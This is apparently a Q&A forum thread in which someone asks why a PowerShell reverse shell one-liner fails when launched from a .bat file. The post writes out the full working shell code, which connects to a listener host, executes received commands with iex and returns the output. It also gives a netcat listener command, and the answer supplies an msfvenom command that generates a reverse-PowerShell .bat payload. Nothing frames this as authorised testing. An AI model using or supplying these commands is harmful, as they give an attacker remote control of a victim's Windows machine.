
I'm trying to run the below reverse shell PowerShell command using a .bat file.

powershell /w 1 "$c=new-object system.net.sockets.tcpclient('192.168.0.66',4777);$s=$c.GetStream();[byte[]]$b = 0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){;$d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$o=(iex $d 2>&1|out-string);$z=$o + 'hacker> ' + (pwd).Path + '> ';$x = ([text.encoding]::ASCII).GetBytes($z);$s.Write($x,0,$x.Length);$s.Flush};$c.close()"

First, I start the netcat listener in Kali:

nc -vv -l -p 4777

I then run the PowerShell command, but I get the following error in Windows 10:

    At line:1 char:112
    + ... 168.0.66',4777);$s=$c.GetStream();[byte[]]$b = 0..65535|:ASCII).GetByte ...
    +                                                                 ~
    Unexpected token ')' in expression or statement.
    At line:1 char:160
    + ... 65535|:ASCII).GetBytes($z);$s.Write($x,0,$x.Length);$s.Flush};$c.clos ...
    +                                                                 ~
    Unexpected token '}' in expression or statement.
        + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
        + FullyQualifiedErrorId : UnexpectedToken

I've tried many possible ', " and ``` combinations and variations, both in and encasing the command. I'm totally stumped.

vskbdvds
  • Can you please help us? I suggest you expand your PowerShell code and write it in a `ps1` file. Is it working? If not, then this is not a batch file problem! – double-beep Jan 10 '19 at 13:19
  • Is it possible it is an extra semi-colon after the opening bracket of the while loop? The first error seems to indicate the $x variable is not resolving correctly. That could be an additional syntax issue? – Jansen McEntee Jan 10 '19 at 14:27
  • If you want to combine batch and powershell in one file you might want to look at this: https://ss64.org/viewtopic.php?pid=9859#p9859 – npocmaka Jan 10 '19 at 15:11

1 Answer


I found myself in the same problem. I wonder why a command that runs without errors in CMD doesn't work well if it's executed inside a .bat file. It doesn't make sense at all.

Metasploit is our friend here:

msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.109 lport=4444 > 1.bat

Source: https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/

tamariz189